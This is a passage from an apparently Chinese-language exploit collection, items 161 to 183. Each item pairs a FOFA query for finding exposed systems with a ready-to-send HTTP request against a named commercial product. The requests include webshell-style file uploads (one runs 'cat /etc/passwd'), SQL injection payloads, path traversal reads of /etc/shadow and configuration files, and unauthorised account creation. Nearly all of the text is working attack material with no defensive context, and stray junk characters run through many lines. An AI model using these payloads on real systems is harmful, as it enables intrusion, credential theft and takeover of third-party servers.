6 K+ r' v( T) h9 MFOFA:body="/KT_Css/qd_defaul.css"( `& u; a$ b$ w" J! g2 o) ]6 {
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
' _, U: t5 ~& h3 DPOST /Webservice.asmx HTTP/1.19 s8 c& T& B9 b- o' H. G# i
Host: x.x.x.x% n( D5 |1 u  J" Y0 l* _' _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) T6 R/ z# T; u2 K$ t9 A" s# j
Connection: close
1 X+ R% ~) f% Z  t4 V  W6 x3 T' MContent-Length: 4455 E$ V* J, S" @) C) V
Content-Type: text/xml
; \( x, {3 |% tAccept-Encoding: gzip$ b9 t, r4 U+ R# W$ _$ Q. L
2 n* e( M8 B% T
<?xml version="1.0" encoding="utf-8"?>
, \1 H: \9 _! B  x5 G6 I  W4 W( O<soap:Envelope xmlns:xsi="
. E, s3 j" Y# |# ahttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"' ?; j  g' Q6 i; h0 {
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" b' ^: A- J/ m! C( o+ ]$ o
<soap:Body>
. D5 w/ Q/ x! k7 E& t" y- F<UploadResume xmlns="http://tempuri.org/">0 r6 }/ E8 s) G7 v: r) u
<ip>1</ip>
  z3 \: D+ g3 F& K* C<fileName>../../../../dizxdell.aspx</fileName>
; j5 ]; X( a) f- l$ K1 S<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>0 x/ E; i6 {; V7 Y8 c% ~1 `
<tag>3</tag>
1 U4 Y! T/ `' q, j</UploadResume>
. C0 T& H. |2 B% t" y& ~: v</soap:Body>
* k5 w8 q* K4 s: d</soap:Envelope>
- I7 M9 q5 o& i; Y% f  T; _9 g4 \
% ^* [( X0 b! s& z
, I6 U: _: ~4 T8 I' Z' qhttp://x.x.x.x/dizxdell.aspx/ c: X' E! ^: y7 F* e

/ k& k5 E" ]+ W: L% t% G3 Z162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传2 U, }- `4 W( g1 |
FOFA: app="和丰山海-数字标牌"+ x5 R& z, B1 b" }! t% u' l
POST /QH.aspx HTTP/1.1) ]0 ^; A9 {- @: W$ U0 @; f
Host: x.x.x.x" G) Z0 p* Z0 i. ?1 I: m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0. m! j, h9 ^; {* C( q0 f
Connection: close
# _/ E% l! |/ G7 n3 V4 {3 RContent-Length: 5832 d: ]2 z6 N' m- V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
9 ]( X4 r: |8 `7 U, @Accept-Encoding: gzip
, `3 Z1 i" A6 [9 I, }
- i! }. w' s2 F% V/ p/ r* c) l------WebKitFormBoundaryeegvclmyurlotuey  U7 Q/ O+ \2 ~# @7 R/ U  p5 N% z
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx", r  K( @- m7 ^, }0 j5 p
Content-Type: application/octet-stream
) a' ^1 i1 u+ `) N' [
+ J+ C7 S+ x. {9 Q<% response.write("ujidwqfuuqjalgkvrpqy") %>/ C/ m  B. }9 }6 u
------WebKitFormBoundaryeegvclmyurlotuey. X5 @0 P$ a$ K7 A5 V
Content-Disposition: form-data; name="action"
" c3 g8 Y1 E5 Z2 ?4 V; A. P; a/ K% \9 u# C# R7 Q1 {
upload1 W& Y- t5 Q7 \2 m6 s- g- `+ n- Z
------WebKitFormBoundaryeegvclmyurlotuey  V- s/ L, T, c/ {% H4 G( a
Content-Disposition: form-data; name="responderId"& p+ Y' w, D* f' c- d! n  G

  C( R3 |! S+ p2 RResourceNewResponder
. V0 V, w. r% U( k4 J* h6 ]6 H------WebKitFormBoundaryeegvclmyurlotuey5 s: S% z* ~* @, ?8 e/ ~
Content-Disposition: form-data; name="remotePath", _: w7 X- f0 i8 y# S8 l3 S$ Z

& _& x8 T9 ~$ R6 R* ]2 ]4 j/opt/resources- G% L# T, b- z+ X
------WebKitFormBoundaryeegvclmyurlotuey--# n  P: N5 |7 f' r# e7 h4 M, V

0 }, o: F3 A7 r- m2 ^% s3 r" X3 g
  \) S  N$ J& E/ j! r! w  Q; Ehttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
5 O' h/ @, g$ ?! C: G2 L5 \
) C& b+ w" b' S  m+ {- ]( `163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" U0 ~) t5 y6 p- fFOFA: icon_hash="-795291075"
( g" L. k4 g  ~! u( n/ \# bPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.17 Y& C' [* ^# c2 ?
Host: x.x.x.x" F0 H+ }) Y) L- \+ L! T* o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
" D, b' B8 o& Q* Z! A# v$ fConnection: close
8 }6 j3 P! I/ F8 m# w0 dContent-Length: 293
* S% a' Q1 C2 Q- ]2 ]Accept: */*& E  C1 t7 U: Z3 d
Accept-Encoding: gzip, deflate( l5 B5 [$ H  H( p
Accept-Language: zh-CN,zh;q=0.9
0 U: s6 E! l) d9 \& A, @Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod. z+ k: E: Z* i4 B1 Z! A% m2 S

! H$ U) Y" w0 m------iiqvnofupvhdyrcoqyuujyetjvqgocod
8 @: t6 B$ r% F2 S1 K3 o( G5 z  o1 kContent-Disposition: form-data; name="name"
0 {1 s( d# J+ w8 i9 _
" s+ P) c. d/ @8 y1.php
. a4 U0 k1 ]4 W3 p% d) ^------iiqvnofupvhdyrcoqyuujyetjvqgocod0 z$ q: @# j7 _+ W8 ]
Content-Disposition: form-data; name="upfile"; filename="1.php"
; R6 t* [( R3 t& X( jContent-Type: image/jpeg5 o% ^( z- p* |5 P  U
! P  N& ?' x3 a
rvjhvbhwwuooyiioxega
% M9 Z; M9 T0 v4 e1 C1 b------iiqvnofupvhdyrcoqyuujyetjvqgocod--
$ S" N5 X- ^5 V9 f6 A7 d/ b9 l6 |% ]5 R( k+ S- l3 M( f
  }  K  }' M) V1 O0 G
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
( J3 ^2 I7 Q$ j! {+ bFOFA: title="智慧综合管理平台登入"
+ H$ @: z8 Z' X6 T1 CPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.17 D( Z& i: s6 `$ j7 t! h7 d' e
Host: x.x.x.x( @* V! {+ a4 [$ }% q: `* L! r# z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- m$ W: Y' M3 E5 Z( r* hContent-Length: 288
1 ^, }+ L2 d, m" o/ T1 ^Accept: application/json, text/javascript, */*; q=0.01* J* |/ Q9 Z6 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,' E" `+ \8 O5 [% }- G7 o8 [8 O
Connection: close6 p0 k8 e! X7 a" q2 k
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl: K$ A4 r1 A+ w9 ~% }. e
X-Requested-With: XMLHttpRequest, y3 ~$ q$ ?+ ]8 J" e* ~$ B
Accept-Encoding: gzip
, Y. a* y5 t# H* M) Q1 ?2 e* W2 a; V7 V. o; u) A' E
------dqdaieopnozbkapjacdbdthlvtlyl8 {0 m3 s- V2 I# b3 m
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
1 b) T" u8 i2 z, D( x5 p4 l  }Content-Type: image/jpeg
8 G  _$ s3 R% N9 a! Z1 F# L' ]9 I( f4 P" b
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
8 u' Z. ~9 a+ y------dqdaieopnozbkapjacdbdthlvtlyl--
6 F, x1 Q0 |. r( |8 r$ ^( g: L. M6 P, V

( [( L% e' I( D, Nhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx6 Y! `8 \+ ^' x  k6 r5 e

8 ]( x- d8 ^6 P165. OrangeHRM 3.3.3 SQL 注入
- ]- ^% i8 ]3 d  ]5 _& Q+ OCVE-2024-36428; C+ S  c$ P" W
FOFA: app="OrangeHRM-产品"
1 X. [' `& h2 \% c6 aURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END)), R0 _( U' Q/ _' Z% [" P

3 E  ~) N5 X. [4 q- \( [9 D+ [4 I+ W( Q
166. 中成科信票务管理平台SeatMapHandler SQL注入5 s, p' B- L3 [, F) o
FOFA:body="技术支持:北京中成科信科技发展有限公司"9 i8 s  `5 d8 z+ b
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
+ l# G1 s% h7 X; cHost:, }( G7 B& Y2 w7 v* e* L  {7 L
Pragma: no-cache
, L! _6 C) G: H$ z$ u9 WCache-Control: no-cache
2 f+ ]* u* l0 N! `/ sUpgrade-Insecure-Requests: 1
4 A) ?7 t4 B. I  C. P! `2 M& rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
8 [& X5 n; A6 W5 c2 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ u' c' S& S3 \# @8 M" p: B4 C
Accept-Encoding: gzip, deflate& n1 J: w8 C7 t
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
2 d8 P- J/ p. n7 O4 C. ACookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
$ K- G! ^) |( ^, Y3 |, B0 vConnection: close5 o- n, W/ z  h# H
Content-Type: application/x-www-form-urlencoded
0 u3 `" o* E. K& C: b/ c0 cContent-Length: 89: Q8 S& q/ G# ?

; ]- W5 Y+ J% k; MMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
7 g8 I4 ]' R7 G. r) N3 U4 X2 k7 b' M+ H  {4 R8 a9 ]5 K; o" V
1 X$ ~) `( `/ O
167. 精益价值管理系统 DownLoad.aspx任意文件读取9 \) {# Q# L. [) L
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
0 D3 ?1 X3 W  w% Z$ h, h6 ~GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1& g1 S) S- n% g: u  ?( \) l2 Q
Host:
1 h, x5 r& L6 h- W1 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 U3 ^; S+ _- H
Content-Type: application/x-www-form-urlencoded9 b$ ?4 w$ a9 c, g( u5 U5 J
Accept-Encoding: gzip, deflate1 R: P- m" Z) D4 D. [, F5 a
Accept: */** ?6 {1 I3 i# w7 h  i
Connection: keep-alive  m% t! c- E/ h

  R! P9 g1 j$ g  f$ I! m# j( O) ?
168. 宏景EHR OutputCode 任意文件读取1 r/ E; u% g7 s5 t/ u
FOFA:app="HJSOFT-HCM", Q4 N' B. ~. ?; e
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1# o; {( J/ F4 ?! J! L% j$ I
Host: your-ip5 y; _7 I" O/ y( |/ m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36* \4 S7 h% H6 k' _& `! @
Content-Type: application/x-www-form-urlencoded$ o$ ^4 t* |" L$ j7 ]4 X# e& i
Connection: close
# I# j) {& K/ j5 \8 O
  F+ C! _9 c  U: v* A) [4 d3 ~; ?1 n# |8 ^6 a7 ^9 @

0 P' q& e5 i( x5 `6 Y169. 宏景EHR downlawbase SQL注入
4 _! o. ?+ U/ A+ T- I7 JFOFA:app="HJSOFT-HCM"8 {. E$ m3 T4 V% o( _! C* v
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1. ]9 \8 A9 ?& {
Host: your-ip
& X0 Q2 @4 ~' _0 f! KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 H% l7 C9 M' C. G# z7 [/ J# |( OAccept: */*2 @. K' U1 w& H' t+ z2 M$ k3 e$ Y
Accept-Encoding: gzip, deflate& [, ^" c2 O+ W: C3 C9 u1 S
Connection: close
7 w# z. O$ o( a( K% u
. ~" z, W" K/ g/ n* V6 I; b1 ]2 v5 e3 b; l' C- m

1 c1 W0 J+ B  d170. 宏景EHR DisplayExcelCustomReport 任意文件读取* Z4 p: O! w# b: j* T
FOFA:body="/general/sys/hjaxmanage.js"
& W5 k- e4 F0 I, a4 `POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1& j1 Y( y, X1 g! M
Host: balalanengliang
4 D$ {2 X, O6 Y- oUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. X1 R4 B; X/ m$ X0 @, KContent-Type: application/x-www-form-urlencoded' A. |: J+ H, k& _6 l% o& L! q5 r
1 `% {+ b5 P% K6 c
filename=../webapps/ROOT/WEB-INF/web.xml
6 h4 J" H; M$ v7 c  [) k5 L0 b- T, P3 Y) O! h

$ ?+ V( y( ^5 S, [3 b171. 通天星CMSV6车载定位监控平台 SQL注入
3 w0 K+ C- U  h- F# Y9 z0 eFOFA:body="/808gps/"
% m) \; X  Q" nGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
: @% R9 C. L9 s0 [# o( MHost: your-ip
  {& g2 \9 ~0 W, ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
4 S$ e, Q) a; Q1 Q! w8 ]0 zAccept: */*$ U7 j2 c( v9 L) Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 E0 o& B  e- Q+ S. V: C5 S$ |
Accept-Encoding: gzip, deflate& g8 g6 Z( m/ C" j- R& k
Connection: close
  |; x( B* ~' B* F1 @1 E1 U% A1 s7 R
5 f, J) [. n8 [2 [! j

  K1 K& j* L% J7 ^# k- W$ Y% \172. DT-高清车牌识别摄像机任意文件读取
. o' a- f# `8 q/ E/ T5 Q; VFOFA:app="DT-高清车牌识别摄像机"2 l; Q. ?  K% i
GET /../../../../etc/passwd HTTP/1.1
: Y, n) c; @/ J; j% p. vHost: your-ip9 }7 c/ d( b4 @/ {2 Q$ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 t& i: \6 c6 _
Accept-Encoding: gzip, deflate
. V5 ^- m1 \0 c* U- yAccept: */*- i8 W: n& j8 F6 F' n& B
Connection: keep-alive
$ L6 ?1 X" m- u/ E0 K, w/ L0 w; d6 ]6 K. Q# t8 P. P" b. ?9 d

+ |$ L, T6 L6 K2 k% @
# D) i, s7 P! \! X173. Check Point 安全网关任意文件读取
2 V" m+ w; F( BCVE-2024-249196 ?2 U+ s- g' E4 [, k+ J2 k
FOFA:app="Check_Point-SSL-Network-Extender"* B# U6 T9 y+ s+ L5 ~
POST /clients/MyCRL HTTP/1.1: ~2 Q4 O" w, i, A* b
Host: your-ip
; @1 G# J$ |3 i  E( H. e* EContent-Type: application/x-www-form-urlencoded1 d7 z. E. K5 f6 v# m

6 w! U: j& ^) m( ~9 {aCSHELL/../../../../../../../etc/shadow
, s" J- v( W3 x3 L- z' p3 A+ k( o- M* O/ i- V. b, p1 k4 @1 y, a
9 @! i  y9 F) k, z. W
& l) y9 C' |5 [2 S6 x+ C. m
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
" d. h- C3 a; f$ u& O; m$ OFOFA:app="金和网络-金和OA"
: n) c' g5 L& ]7 l6 X) BGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1. K: R3 j8 b9 E5 Q3 ]4 e
Host: your-ip
" }- n# C% Q* b" N) LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- J$ L% u! Y! Y5 u/ ]0 }+ R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& L; c  @4 Z9 u. Y0 O8 A( xAccept-Encoding: gzip, deflate, br
% H9 S/ s5 ^+ T" t- qAccept-Language: zh-CN,zh;q=0.9
2 Y  w0 U8 }  h% ^. n2 I# ^Connection: close  Z9 y# d2 i5 V2 {% H& T

6 n( w  a+ f7 `; @: {$ L! ?1 x7 t: ^. G( b* [- a

$ E" t3 Y& z$ [! c/ y9 f  g175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
! n/ z) \& ~  ?2 }' C: {FOFA:app="金和网络-金和OA"
1 c3 _9 P9 E2 f; Z9 p3 p8 gGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
# f, ~( E8 D! lHost:: ~& U2 K+ {. _: i0 p& j
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" u6 b4 u/ b- ~* n2 Z  kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 H" X0 r( [7 j$ b7 r/ x, EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# [) H3 }3 e/ R; k1 W& Z! }
Accept-Encoding: gzip, deflate  _! y6 u7 w+ k5 f: K% `5 K, T, p  Z
Connection: close  _9 B6 c8 G# j- s- T" h. Z+ m
Upgrade-Insecure-Requests: 1
; ^  u2 S4 a4 c- L
/ W0 r8 S) _6 R% `0 I8 s2 L4 u- y+ }1 n/ n  u
176. 电信网关配置管理系统 rewrite.php 文件上传
( o+ Z" S" D& n4 P# h/ c! YFOFA:body="img/login_bg3.png" && body="系统登录"
$ E1 s5 |3 _  B6 R7 f4 B2 c7 RPOST /manager/teletext/material/rewrite.php HTTP/1.1! ~+ F2 r6 J, S. i% z6 Y: S- b
Host: your-ip/ h6 G) N* {# l! s" k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( v4 W) @1 b( Z3 w; rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
) H/ e. A+ h/ w6 R, \' {. S7 SConnection: close- l$ P9 w$ H1 U0 w& o- N& w

$ A: r/ k. U  }1 _  T1 n) q$ X------WebKitFormBoundaryOKldnDPT8 _) e9 u1 T5 _4 u) `- b
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
! x( ?9 h$ ~% B  `; z6 DContent-Type: image/png
+ I$ _; p! n0 c( S  s . I  m$ A0 \6 @8 [
<?php system("cat /etc/passwd");unlink(__FILE__);?>) z/ z' G. ]2 R9 i- l! F" Q
------WebKitFormBoundaryOKldnDPT9 T& J% z6 |& _
Content-Disposition: form-data; name="uploadtime"
! J8 A; m( }  D, ?- y5 }5 g
$ ^8 @( {! ^# n 8 c' m, [1 H  r9 U: Y
------WebKitFormBoundaryOKldnDPT--
+ H+ h5 L. Z) U# a; @1 W( \6 E+ Z! X% O5 z
: P: [! n7 m% w7 e

8 a( a5 L; s6 T6 p177. H3C路由器敏感信息泄露
. l# ^: e# c, j- J  v/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg8 G5 \( V4 S$ A1 f" s. \7 t2 w
/userLogin.asp/../actionpolicy_status/../M60.cfg$ [. `5 @+ y( b5 {, R, _+ Q4 F6 J" a
/userLogin.asp/../actionpolicy_status/../GR8300.cfg# u1 X+ F' I  g& Z. U
/userLogin.asp/../actionpolicy_status/../GR5200.cfg" s' q6 j' R/ N  v- _
/userLogin.asp/../actionpolicy_status/../GR3200.cfg4 x/ y' D( q) U
/userLogin.asp/../actionpolicy_status/../GR2200.cfg- G9 e; c9 E9 }: x; E
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
' S# v: _  P) p+ w, m9 ?5 a4 j/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
& ~; L) B* V0 Q3 h/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
  g& G4 U9 e  [# e& v/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
  n. w# @( q" S/ _" g0 W; T/userLogin.asp/../actionpolicy_status/../ER5200.cfg
& i0 v8 X9 B1 n2 s2 \/userLogin.asp/../actionpolicy_status/../ER5100.cfg# U8 {/ r: A" N  t! s
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 T$ Y8 c3 ~5 N+ B5 A6 [
/userLogin.asp/../actionpolicy_status/../ER3260.cfg7 ?1 C) L6 \1 |% B/ D# {2 O' H3 w5 G% M
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg9 X  [  b% i& Q5 y" [! |8 u" e
/userLogin.asp/../actionpolicy_status/../ER3200.cfg8 J5 y; a/ X2 Q+ I: l
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg$ O5 |1 z2 M+ S9 e( p& N
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg; g/ Y9 s1 P% |7 p( ]
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg- A  a# q1 H# o
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
9 x& B. S& r! m6 N; `/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
) ?4 ~! |5 ]; @" L4 O/ |' P! U4 W9 T: \7 u' L7 I" H

* ^7 W9 t( X0 |- q5 O2 S178. H3C校园网自助服务系统-flexfileupload-任意文件上传
5 z/ q# _9 X. W$ @# gFOFA:header="/selfservice"  P" G. i1 j) }" e# S! `% z+ P1 n
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.10 O+ Y4 C7 i, K$ w" l8 K
Host:
4 Z6 X: k$ C! M- ?2 x% WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# h! h5 N, A( N% b
Content-Length: 252& _4 M! z* `' o. \  N
Accept-Encoding: gzip, deflate
2 t$ h6 h' }4 w! RConnection: close
9 ?4 t- e* T- t9 o$ a5 oContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
6 i* [, ]1 `8 [2 }-----------------aqutkea7vvanpqy3rh2l
3 E5 ]% Q2 W' `. i/ l" ^- |Content-Disposition: form-data; name="12234.txt"; filename="12234"! C( D$ e. Z, o4 p, u
Content-Type: application/octet-stream7 \4 _8 f0 W" Z9 J! s
Content-Length: 2558 c& w) e# y  K: G' T% A# Z
) n9 [9 P+ q4 w
12234
0 I) u: s- I) |0 p5 I, ]-----------------aqutkea7vvanpqy3rh2l--1 B0 r7 t) g) a1 ~2 x
4 n- n% ]% p4 i/ V5 c. z
4 `" [3 T  ]- A2 g' [' ^) _# A
GET /imc/primepush/%2e%2e/flex/12234.txt
5 p6 H6 X  X+ |( {: W4 H
( W( `. B8 {- G; d
& x( Z! x, X" L179. 建文工程管理系统存在任意文件读取
0 {5 R+ ?6 O7 ^5 F' t( zPOST /Common/DownLoad2.aspx HTTP/1.1
$ [( }2 [5 ?4 [( {Host: {{Hostname}}' f4 _7 ]9 y. |6 |- B5 A% d; ]+ q
Content-Type: application/x-www-form-urlencoded
4 D* q% S  v7 `4 p6 fUser-Agent: Mozilla/5.0
4 q1 a" j6 q; Y8 v! T& y) d
8 I+ t! ^, k9 lpath=../log4net.config&Name=7 k! R2 }/ P' t, ^1 ?7 `

: W5 Y# |  E; ^, X/ i4 m5 _1 W: x* }* u3 Z" q
180. 帮管客 CRM jiliyu SQL注入8 ^+ j9 L3 a- V  D2 ?. ~- l9 H$ x, ^; t
FOFA:app="帮管客-CRM"5 U  a6 v! ~! }* g" r4 g( G
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
# y1 `0 o( R% N1 [" w# T+ n' FHost: your-ip
* p) C8 r/ P+ C) k1 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ l: l4 d  m( }& J) _/ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# y2 D% g5 @+ D9 ^Accept-Encoding: gzip, deflate  F* d0 w- [: e* W& v
Accept-Language: zh-CN,zh;q=0.9
2 ^3 R# \4 e+ J$ E/ ZConnection: close
" W9 G8 \* {. t1 Z4 ^" V, N1 W% C# z7 z+ U' c" q

8 N7 [" J8 _9 V5 B" b- S181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入% M/ [8 X* x/ ^* j0 E- {
FOFA:"PDCA/js/_publicCom.js". O! b  T! w9 Y+ Q. M3 g
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1& q* E5 h1 j( J" `
Host: your-ip6 a3 y2 x, b# B" ]* V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 L3 C2 d/ D- ~7 L8 b2 D( WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: l7 {) l* G% T
Accept-Encoding: gzip, deflate, br$ u, m6 K+ [& X3 Z
Accept-Language: zh-CN,zh;q=0.9( z" i# B; x6 t6 M
Connection: close) T  S: ~: i9 z" f& Y  v' I! _
Content-Type: application/x-www-form-urlencoded
9 L! {1 r$ J- j/ F4 \- m6 H/ |8 s
9 t9 h. [- h3 C, D8 T* Q; ?; i% I' u. I) n% g- J2 W; v
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
- j, M0 l8 {- L$ H+ |4 S
2 M  O3 Z" Y% z7 F# D% [' _
+ u3 u, W7 \9 p, N' R182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
( j+ H' ^0 c+ R* R. @" W1 a3 i" |FOFA:"PDCA/js/_publicCom.js", C2 S8 q+ N) h( L' i  g$ g
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1. \: h: ~+ i' M- p6 S+ x# \3 F
Host: your-ip0 j7 s* m+ H- W6 r8 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
" J) C" E$ v8 l$ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 e! h  t$ t$ y
Accept-Encoding: gzip, deflate, br
4 F  x' @8 k/ u" QAccept-Language: zh-CN,zh;q=0.9
7 e# h7 N: d. e" wConnection: close
2 Q9 s0 T7 l% g% QContent-Type: application/x-www-form-urlencoded$ @* z+ B  @, F% v/ h
+ w6 d2 e* N* V$ O! j- H0 s

6 j' X# P. u8 X% `! |3 k! z* uusername=test1234&pwd=test1234&savedays=1
( ^4 ~- C( D% w2 h" X1 ~) t& h! E$ F
4 D) \* Z8 o2 R2 S" V. v
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
4 @4 S9 x1 U7 h% cFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
' _& s. [8 ]# ]GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.12 i3 C5 q0 X5 u# A; h- _" R
Host: your-ip0 T5 ~' Q: P" k* P. o8 h
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ z# E6 N$ v0 s0 L- c# L3 ^
Accept-Charset: utf-8
7 S& C4 Q. B" \: o6 V5 nAccept-Encoding: gzip, deflate
# `4 N% h: d) ?1 n" Q, h6 QConnection: close  [+ C3 }) p7 E& i/ t7 t

